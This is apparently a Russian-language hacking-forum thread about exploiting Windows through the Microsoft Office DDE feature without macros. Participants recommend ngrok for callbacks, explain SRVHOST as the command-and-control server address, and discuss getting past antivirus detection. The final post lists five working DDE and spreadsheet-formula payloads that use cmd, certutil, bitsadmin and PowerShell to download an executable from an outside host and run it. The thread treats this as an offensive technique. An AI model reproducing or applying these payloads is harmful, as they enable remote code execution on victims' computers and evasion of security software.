Статья Использование Windows при помощи DDE эксплойта Microsoft Office (MACROLESS)

[EliotAnderson]

Выйдет. Через ngrok вообще всё всегда выходит! Стабильно хорошая штука!

А не подскажете что за параметр SRVHOST?

 

[QZ131]

народ, макросы это совсем другой вид уязвимости..По dde если система с обновлениями, то ничего не получится. плюс антивирусы палят безбожно.

Тема рабочая, но с нюансами. На данный момент, многие темы палятся антивирусами, но применяя их в многоступенчатых подходах. Все заходит.

А не подскажете что за параметр SRVHOST?

Адрес управляющего сервера.

 

[erlan1749]

Тема рабочая, но с нюансами. На данный момент, многие темы палятся антивирусами, но применяя их в многоступенчатых подходах. Все заходит.

не подскажешь какие нюансы?

 

[☠xrahitel☠]

можно так пока не палиться

 

[erlan1749]

можно так пока не палиться Посмотреть вложение 33519

можно код получить,тот который вводили в яндексе?

 

[☠xrahitel☠]

можно код получить,тот который вводили в яндексе?

cmd /c certutil -urlcache -split -f https://the.earth.li/~sgtatham/putty/latest/w32/putty.exe %APPDATA%\putty.exe & start %APPDATA%\putty.exe
=cmd|' /c bitsadmin /transfer d90f https://the.earth.li/~sgtatham/putty/latest/w32/putty.exe %APPDATA%\putty.exe&%APPDATA%\putty.exe&del %APPDATA%\putty.exe'!A0
=cmd|' /C powershell Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w32/putty.exe -OutFile "$env:Temp\putty.exe"; Start-Process "$env:Temp\putty.exe"'!A1
-2+3+cmd|'/C explorer https://the.earth.li/~sgtatham/putty/latest/w32/putty.exe'!A1&cmd|' /C %USERPROFILE%\Downloads\putty.exe'!A1
=cmd|'/c powershell -command "& { iwr https://the.earth.li/~sgtatham/putty/latest/w32/putty.exe -OutFile putty.exe }";cmd /c putty.exe'!A1